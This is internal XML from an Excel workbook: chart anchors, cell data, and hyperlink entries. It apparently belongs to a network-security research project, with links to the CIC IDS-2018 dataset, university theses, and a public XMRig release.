      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="109" name="Chart 109" title="Gráfico"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="0" cy="0"/>
      </xdr:xfrm>
      <a:graphic>
        <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
          <c:chart r:id="rId19"/>
        </a:graphicData>
      </a:graphic>
    </xdr:graphicFrame>
    <xdr:clientData fLocksWithSheet="0"/>
  </xdr:oneCellAnchor>
  <xdr:oneCellAnchor>
    <xdr:from>
      <xdr:col>11</xdr:col>
      <xdr:colOff>666750</xdr:colOff>
      <xdr:row>378</xdr:row>
      <xdr:rowOff>180975</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="8696325" cy="5372100"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="110" name="Chart 110" title="Gráfico"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="0" cy="0"/>
      </xdr:xfrm>
      <a:graphic>
        <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
          <c:chart r:id="rId20"/>
        </a:graphicData>
      </a:graphic>
    </xdr:graphicFrame>
    <xdr:clientData fLocksWithSheet="0"/>
  </xdr:oneCellAnchor>
  <xdr:oneCellAnchor>
    <xdr:from>
      <xdr:col>11</xdr:col>
      <xdr:colOff>209550</xdr:colOff>
      <xdr:row>422</xdr:row>
      <xdr:rowOff>104775</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="6705600" cy="4143375"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="111" name="Chart 111" title="Gráfico"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="0" cy="0"/>
      </xdr:xfrm>
      <a:graphic>
        <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
          <c:chart r:id="rId21"/>
        </a:graphicData>
      </a:graphic>
    </xdr:graphicFrame>
    <xdr:clientData fLocksWithSheet="0"/>
  </xdr:oneCellAnchor>
  <xdr:oneCellAnchor>
    <xdr:from>
      <xdr:col>10</xdr:col>
      <xdr:colOff>2571750</xdr:colOff>
      <xdr:row>467</xdr:row>
      <xdr:rowOff>76200</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="9058275" cy="5600700"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="112" name="Chart 112" title="Gráfico"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="0" cy="0"/>
      </xdr:xfrm>
      <a:graphic>
        <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
          <c:chart r:id="rId22"/>
        </a:graphicData>
      </a:graphic>
    </xdr:graphicFrame>
    <xdr:clientData fLocksWithSheet="0"/>
  </xdr:oneCellAnchor>
  <xdr:oneCellAnchor>
    <xdr:from>
      <xdr:col>13</xdr:col>
      <xdr:colOff>419100</xdr:colOff>
      <xdr:row>496</xdr:row>
      <xdr:rowOff>104775</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="7181850" cy="4438650"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="113" name="Chart 113" title="Gráfico"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="0" cy="0"/>
      </xdr:xfrm>
      <a:graphic>
        <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
          <c:chart r:id="rId23"/>
        </a:graphicData>
      </a:graphic>
    </xdr:graphicFrame>
    <xdr:clientData fLocksWithSheet="0"/>
  </xdr:oneCellAnchor>
  <xdr:oneCellAnchor>
    <xdr:from>
      <xdr:col>13</xdr:col>
      <xdr:colOff>428625</xdr:colOff>
      <xdr:row>519</xdr:row>
      <xdr:rowOff>190500</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="7181850" cy="4438650"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="114" name="Chart 114" title="Gráfico"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="0" cy="0"/>
      </xdr:xfrm>
      <a:graphic>
        <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
          <c:chart r:id="rId24"/>
        </a:graphicData>
      </a:graphic>
    </xdr:graphicFrame>
    <xdr:clientData fLocksWithSheet="0"/>
  </xdr:oneCellAnchor>
  <xdr:oneCellAnchor>
    <xdr:from>
      <xdr:col>13</xdr:col>
      <xdr:colOff>276225</xdr:colOff>
      <xdr:row>543</xdr:row>
      <xdr:rowOff>142875</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="7496175" cy="4638675"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="115" name="Chart 115" title="Gráfico"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="0" cy="0"/>
      </xdr:xfrm>
      <a:graphic>
        <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
          <c:chart r:id="rId25"/>
        </a:graphicData>
      </a:graphic>
    </xdr:graphicFrame>
    <xdr:clientData fLocksWithSheet="0"/>
  </xdr:oneCellAnchor>
  <xdr:oneCellAnchor>
    <xdr:from>
      <xdr:col>10</xdr:col>
      <xdr:colOff>390525</xdr:colOff>
      <xdr:row>580</xdr:row>
      <xdr:rowOff>47625</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="6486525" cy="4010025"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="116" name="Chart 116" title="Gráfico"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="0" cy="0"/>
      </xdr:xfrm>
      <a:graphic>
        <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
          <c:chart r:id="rId26"/>
        </a:graphicData>
      </a:graphic>
    </xdr:graphicFrame>
    <xdr:clientData fLocksWithSheet="0"/>
  </xdr:oneCellAnchor>
  <xdr:oneCellAnchor>
    <xdr:from>
      <xdr:col>13</xdr:col>
      <xdr:colOff>190500</xdr:colOff>
      <xdr:row>580</xdr:row>
      <xdr:rowOff>57150</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="6486525" cy="4010025"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="117" name="Chart 117" title="Gráfico"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="0" cy="0"/>
      </xdr:xfrm>
      <a:graphic>
        <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
          <c:chart r:id="rId27"/>
        </a:graphicData>
      </a:graphic>
    </xdr:graphicFrame>
    <xdr:clientData fLocksWithSheet="0"/>
  </xdr:oneCellAnchor>
  <xdr:oneCellAnchor>
    <xdr:from>
      <xdr:col>7</xdr:col>
      <xdr:colOff>1285875</xdr:colOff>
      <xdr:row>622</xdr:row>
      <xdr:rowOff>85725</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="9410700" cy="5819775"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="118" name="Chart 118" title="Gráfico"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="0" cy="0"/>
      </xdr:xfrm>
      <a:graphic>
        <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
          <c:chart r:id="rId28"/>
        </a:graphicData>
      </a:graphic>
    </xdr:graphicFrame>
    <xdr:clientData fLocksWithSheet="0"/>
  </xdr:oneCellAnchor>
  <xdr:oneCellAnchor>
    <xdr:from>
      <xdr:col>23</xdr:col>
      <xdr:colOff>361950</xdr:colOff>
      <xdr:row>233</xdr:row>
      <xdr:rowOff>38100</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="7248525" cy="4476750"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="119" name="Chart 119" title="Gráfico"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="0" cy="0"/>
      </xdr:xfrm>
      <a:graphic>
        <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
          <c:chart r:id="rId29"/>
        </a:graphicData>
      </a:graphic>
    </xdr:graphicFrame>
    <xdr:clientData fLocksWithSheet="0"/>
  </xdr:oneCellAnchor>
  <xdr:oneCellAnchor>
    <xdr:from>
      <xdr:col>25</xdr:col>
      <xdr:colOff>476250</xdr:colOff>
      <xdr:row>260</xdr:row>
      <xdr:rowOff>161925</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="8391525" cy="5181600"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="120" name="Chart 120" title="Gráfico"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="0" cy="0"/>
      </xdr:xfrm>
      <a:graphic>
        <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
          <c:chart r:id="rId30"/>
        </a:graphicData>
      </a:graphic>
    </xdr:graphicFrame>
    <xdr:clientData fLocksWithSheet="0"/>
  </xdr:oneCellAnchor>
  <xdr:oneCellAnchor>
    <xdr:from>
      <xdr:col>23</xdr:col>
      <xdr:colOff>962025</xdr:colOff>
      <xdr:row>314</xdr:row>
      <xdr:rowOff>133350</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="7143750" cy="4419600"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="121" name="Chart 121" title="Gráfico"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="0" cy="0"/>
      </xdr:xfrm>
      <a:graphic>
        <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
          <c:chart r:id="rId31"/>
        </a:graphicData>
      </a:graphic>
    </xdr:graphicFrame>
    <xdr:clientData fLocksWithSheet="0"/>
  </xdr:oneCellAnchor>
  <xdr:oneCellAnchor>
    <xdr:from>
      <xdr:col>20</xdr:col>
      <xdr:colOff>1257300</xdr:colOff>
      <xdr:row>378</xdr:row>
      <xdr:rowOff>180975</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="8696325" cy="5372100"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="122" name="Chart 122" title="Gráfico"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="0" cy="0"/>
      </xdr:xfrm>
      <a:graphic>
        <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
          <c:chart r:id="rId32"/>
        </a:graphicData>
      </a:graphic>
    </xdr:graphicFrame>
    <xdr:clientData fLocksWithSheet="0"/>
  </xdr:oneCellAnchor>
  <xdr:oneCellAnchor>
    <xdr:from>
      <xdr:col>22</xdr:col>
      <xdr:colOff>676275</xdr:colOff>
      <xdr:row>422</xdr:row>
      <xdr:rowOff>104775</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="6705600" cy="4143375"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="123" name="Chart 123" title="Gráfico"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="0" cy="0"/>
      </xdr:xfrm>
      <a:graphic>
        <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
          <c:chart r:id="rId33"/>
        </a:graphicData>
      </a:graphic>
    </xdr:graphicFrame>
    <xdr:clientData fLocksWithSheet="0"/>
  </xdr:oneCellAnchor>
  <xdr:oneCellAnchor>
    <xdr:from>
      <xdr:col>20</xdr:col>
      <xdr:colOff>1343025</xdr:colOff>
      <xdr:row>467</xdr:row>
      <xdr:rowOff>76200</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="9058275" cy="5600700"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="124" name="Chart 124" title="Gráfico"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="0" cy="0"/>
      </xdr:xfrm>
      <a:graphic>
        <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
          <c:chart r:id="rId34"/>
        </a:graphicData>
      </a:graphic>
    </xdr:graphicFrame>
    <xdr:clientData fLocksWithSheet="0"/>
  </xdr:oneCellAnchor>
  <xdr:oneCellAnchor>
    <xdr:from>
      <xdr:col>26</xdr:col>
      <xdr:colOff>695325</xdr:colOff>
      <xdr:row>496</xdr:row>
      <xdr:rowOff>114300</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="7181850" cy="4438650"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="125" name="Chart 125" title="Gráfico"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="0" cy="0"/>
      </xdr:xfrm>
      <a:graphic>
        <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
          <c:chart r:id="rId35"/>
        </a:graphicData>
      </a:graphic>
    </xdr:graphicFrame>
    <xdr:clientData fLocksWithSheet="0"/>
  </xdr:oneCellAnchor>
  <xdr:oneCellAnchor>
    <xdr:from>
      <xdr:col>26</xdr:col>
      <xdr:colOff>647700</xdr:colOff>
      <xdr:row>519</xdr:row>
      <xdr:rowOff>161925</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="7181850" cy="4438650"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="126" name="Chart 126" title="Gráfico"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="0" cy="0"/>
      </xdr:xfrm>
      <a:graphic>
        <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
          <c:chart r:id="rId36"/>
        </a:graphicData>
      </a:graphic>
    </xdr:graphicFrame>
    <xdr:clientData fLocksWithSheet="0"/>
  </xdr:oneCellAnchor>
  <xdr:oneCellAnchor>
    <xdr:from>
      <xdr:col>26</xdr:col>
      <xdr:colOff>647700</xdr:colOff>
      <xdr:row>543</xdr:row>
      <xdr:rowOff>85725</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="7496175" cy="4638675"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="127" name="Chart 127" title="Gráfico"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="0" cy="0"/>
      </xdr:xfrm>
      <a:graphic>
        <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
          <c:chart r:id="rId37"/>
        </a:graphicData>
      </a:graphic>
    </xdr:graphicFrame>
    <xdr:clientData fLocksWithSheet="0"/>
  </xdr:oneCellAnchor>
  <xdr:oneCellAnchor>
    <xdr:from>
      <xdr:col>22</xdr:col>
      <xdr:colOff>28575</xdr:colOff>
      <xdr:row>580</xdr:row>
      <xdr:rowOff>47625</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="6486525" cy="4010025"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="128" name="Chart 128" title="Gráfico"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="0" cy="0"/>
      </xdr:xfrm>
      <a:graphic>
        <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
          <c:chart r:id="rId38"/>
        </a:graphicData>
      </a:graphic>
    </xdr:graphicFrame>
    <xdr:clientData fLocksWithSheet="0"/>
  </xdr:oneCellAnchor>
  <xdr:oneCellAnchor>
    <xdr:from>
      <xdr:col>26</xdr:col>
      <xdr:colOff>552450</xdr:colOff>
      <xdr:row>580</xdr:row>
      <xdr:rowOff>47625</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="6486525" cy="4010025"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="129" name="Chart 129" title="Gráfico"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="0" cy="0"/>
      </xdr:xfrm>
      <a:graphic>
        <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
          <c:chart r:id="rId39"/>
        </a:graphicData>
      </a:graphic>
    </xdr:graphicFrame>
    <xdr:clientData fLocksWithSheet="0"/>
  </xdr:oneCellAnchor>
  <xdr:oneCellAnchor>
    <xdr:from>
      <xdr:col>21</xdr:col>
      <xdr:colOff>1581150</xdr:colOff>
      <xdr:row>624</xdr:row>
      <xdr:rowOff>161925</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="9410700" cy="5819775"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="130" name="Chart 130" title="Gráfico"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="0" cy="0"/>
      </xdr:xfrm>
      <a:graphic>
        <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
          <c:chart r:id="rId40"/>
        </a:graphicData>
      </a:graphic>
    </xdr:graphicFrame>
    <xdr:clientData fLocksWithSheet="0"/>
  </xdr:oneCellAnchor>
  <xdr:oneCellAnchor>
    <xdr:from>
      <xdr:col>22</xdr:col>
      <xdr:colOff>1571625</xdr:colOff>
      <xdr:row>15</xdr:row>
      <xdr:rowOff>209550</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="6619875" cy="4086225"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="131" name="Chart 131" title="Gráfico"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="0" cy="0"/>
      </xdr:xfrm>
      <a:graphic>
        <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
          <c:chart r:id="rId41"/>
        </a:graphicData>
      </a:graphic>
    </xdr:graphicFrame>
    <xdr:clientData fLocksWithSheet="0"/>
  </xdr:oneCellAnchor>
  <xdr:oneCellAnchor>
    <xdr:from>
      <xdr:col>29</xdr:col>
      <xdr:colOff>733425</xdr:colOff>
      <xdr:row>52</xdr:row>
      <xdr:rowOff>57150</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="8505825" cy="4829175"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="132" name="Chart 132" title="Gráfico"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="0" cy="0"/>
      </xdr:xfrm>
      <a:graphic>
        <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
          <c:chart r:id="rId42"/>
        </a:graphicData>
      </a:graphic>
    </xdr:graphicFrame>
    <xdr:clientData fLocksWithSheet="0"/>
  </xdr:oneCellAnchor>
  <xdr:oneCellAnchor>
    <xdr:from>
      <xdr:col>38</xdr:col>
      <xdr:colOff>352425</xdr:colOff>
      <xdr:row>54</xdr:row>
      <xdr:rowOff>28575</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="6619875" cy="4086225"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="133" name="Chart 133" title="Gráfico"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="0" cy="0"/>
      </xdr:xfrm>
      <a:graphic>
        <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
          <c:chart r:id="rId43"/>
        </a:graphicData>
      </a:graphic>
    </xdr:graphicFrame>
    <xdr:clientData fLocksWithSheet="0"/>
  </xdr:oneCellAnchor>
  <xdr:oneCellAnchor>
    <xdr:from>
      <xdr:col>28</xdr:col>
      <xdr:colOff>1162050</xdr:colOff>
      <xdr:row>233</xdr:row>
      <xdr:rowOff>38100</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="7248525" cy="4476750"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="134" name="Chart 134" title="Gráfico"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="0" cy="0"/>
      </xdr:xfrm>
      <a:graphic>
        <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
          <c:chart r:id="rId44"/>
        </a:graphicData>
      </a:graphic>
    </xdr:graphicFrame>
    <xdr:clientData fLocksWithSheet="0"/>
  </xdr:oneCellAnchor>
  <xdr:oneCellAnchor>
    <xdr:from>
      <xdr:col>34</xdr:col>
      <xdr:colOff>114300</xdr:colOff>
      <xdr:row>260</xdr:row>
      <xdr:rowOff>161925</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="8391525" cy="5181600"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="135" name="Chart 135" title="Gráfico"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="0" cy="0"/>
      </xdr:xfrm>
      <a:graphic>
        <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
          <c:chart r:id="rId45"/>
        </a:graphicData>
      </a:graphic>
    </xdr:graphicFrame>
    <xdr:clientData fLocksWithSheet="0"/>
  </xdr:oneCellAnchor>
</xdr:wsD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github.com/xmrig/xmrig/releases/download/v6.11.2/xmrig-6.11.2-linux-x64.tar.gz" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.unb.ca/cic/datasets/ids-2018.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ip/" TargetMode="External"/><Relationship Id="rId4"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hyperlink" Target="https://idus.us.es/items/88bc3f70-881a-4b0a-982e-3d60d0a07d65" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://idus.us.es/handle/11441/143609" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://biblus.us.es/bibing/proyectos/abreproy/94340/fichero/TFG-4340+GARC%C3%8DA+CORONADO%2C+ANDR%C3%89S.pdf" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.unb.ca/cic/datasets/ids-2018.html" TargetMode="External"/><Relationship Id="rId5"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28.38"/>
    <col customWidth="1" min="4" max="4" width="69.25"/>
    <col customWidth="1" min="5" max="5" width="27.63"/>
    <col customWidth="1" min="6" max="6" width="21.5"/>
    <col customWidth="1" min="7" max="7" width="24.25"/>
  </cols>
  <sheetData>
    <row r="4">
      <c r="C4" s="1" t="s">
        <v>0</v>
      </c>
      <c r="D4" s="2"/>
      <c r="E4" s="2"/>
      <c r="F4" s="2"/>
      <c r="G4" s="2"/>
      <c r="H4" s="2"/>
      <c r="I4" s="2"/>
      <c r="J4" s="2"/>
      <c r="K4" s="3"/>
    </row>
    <row r="5">
      <c r="C5" s="4"/>
      <c r="D5" s="5"/>
      <c r="E5" s="5"/>
      <c r="F5" s="5"/>
      <c r="G5" s="5"/>
      <c r="H5" s="5"/>
      <c r="I5" s="5"/>
      <c r="J5" s="5"/>
      <c r="K5" s="6"/>
    </row>
    <row r="7" ht="19.5" customHeight="1">
      <c r="C7" s="7" t="s">
        <v>1</v>
      </c>
      <c r="D7" s="8" t="s">
        <v>2</v>
      </c>
      <c r="E7" s="8" t="s">
        <v>3</v>
      </c>
      <c r="F7" s="8" t="s">
        <v>4</v>
      </c>
      <c r="G7" s="8" t="s">
        <v>5</v>
      </c>
      <c r="H7" s="8" t="s">
        <v>6</v>
      </c>
      <c r="I7" s="8" t="s">
        <v>7</v>
      </c>
      <c r="J7" s="8" t="s">
        <v>8</v>
      </c>
      <c r="K7" s="9" t="s">
        <v>9</v>
      </c>
      <c r="L7" s="10"/>
      <c r="M7" s="10"/>
      <c r="N7" s="10"/>
      <c r="O7" s="10"/>
      <c r="P7" s="10"/>
      <c r="Q7" s="10"/>
    </row>
    <row r="8" ht="51.75" customHeight="1">
      <c r="C8" s="11" t="s">
        <v>10</v>
      </c>
      <c r="D8" s="12" t="s">
        <v>11</v>
      </c>
      <c r="E8" s="12">
        <v>4022.0</v>
      </c>
      <c r="F8" s="13" t="s">
        <v>12</v>
      </c>
      <c r="G8" s="14">
        <v>45442.0</v>
      </c>
      <c r="H8" s="15" t="s">
        <v>13</v>
      </c>
      <c r="I8" s="16" t="s">
        <v>13</v>
      </c>
      <c r="J8" s="17" t="s">
        <v>13</v>
      </c>
      <c r="K8" s="18" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="9" ht="51.75" customHeight="1">
      <c r="C9" s="19" t="s">
        <v>14</v>
      </c>
      <c r="D9" s="20" t="s">
        <v>15</v>
      </c>
      <c r="E9" s="20">
        <v>45551.0</v>
      </c>
      <c r="F9" s="21" t="s">
        <v>12</v>
      </c>
      <c r="G9" s="22">
        <v>45442.0</v>
      </c>
      <c r="H9" s="23"/>
      <c r="I9" s="24"/>
      <c r="J9" s="25" t="s">
        <v>13</v>
      </c>
      <c r="K9" s="26" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="10" ht="51.75" customHeight="1">
      <c r="C10" s="19" t="s">
        <v>16</v>
      </c>
      <c r="D10" s="20" t="s">
        <v>17</v>
      </c>
      <c r="E10" s="20">
        <v>35763.0</v>
      </c>
      <c r="F10" s="21">
        <v>10605.0</v>
      </c>
      <c r="G10" s="22">
        <v>45441.0</v>
      </c>
      <c r="H10" s="23"/>
      <c r="I10" s="27" t="s">
        <v>13</v>
      </c>
      <c r="J10" s="25" t="s">
        <v>13</v>
      </c>
      <c r="K10" s="28"/>
    </row>
    <row r="11" ht="51.75" customHeight="1">
      <c r="C11" s="29" t="s">
        <v>18</v>
      </c>
      <c r="D11" s="30" t="s">
        <v>19</v>
      </c>
      <c r="E11" s="30">
        <v>47830.0</v>
      </c>
      <c r="F11" s="30" t="s">
        <v>12</v>
      </c>
      <c r="G11" s="31">
        <v>45441.0</v>
      </c>
      <c r="H11" s="32"/>
      <c r="I11" s="33"/>
      <c r="J11" s="34"/>
      <c r="K11" s="35" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="12" ht="21.75" customHeight="1"/>
    <row r="13">
      <c r="C13" s="36"/>
      <c r="D13" s="36"/>
      <c r="E13" s="36"/>
      <c r="F13" s="36"/>
      <c r="G13" s="36"/>
      <c r="H13" s="36"/>
      <c r="I13" s="36"/>
    </row>
    <row r="14">
      <c r="C14" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D14" s="2"/>
      <c r="E14" s="2"/>
      <c r="F14" s="2"/>
      <c r="G14" s="2"/>
      <c r="H14" s="2"/>
      <c r="I14" s="2"/>
      <c r="J14" s="2"/>
      <c r="K14" s="3"/>
    </row>
    <row r="15">
      <c r="C15" s="4"/>
      <c r="D15" s="5"/>
      <c r="E15" s="5"/>
      <c r="F15" s="5"/>
      <c r="G15" s="5"/>
      <c r="H15" s="5"/>
      <c r="I15" s="5"/>
      <c r="J15" s="5"/>
      <c r="K15" s="6"/>
    </row>
    <row r="17">
      <c r="C17" s="7" t="s">
        <v>21</v>
      </c>
      <c r="D17" s="8" t="s">
        <v>2</v>
      </c>
      <c r="E17" s="8" t="s">
        <v>3</v>
      </c>
      <c r="F17" s="8" t="s">
        <v>22</v>
      </c>
      <c r="G17" s="8" t="s">
        <v>23</v>
      </c>
      <c r="H17" s="8" t="s">
        <v>5</v>
      </c>
      <c r="I17" s="9" t="s">
        <v>24</v>
      </c>
    </row>
    <row r="18" ht="44.25" customHeight="1">
      <c r="C18" s="37" t="s">
        <v>25</v>
      </c>
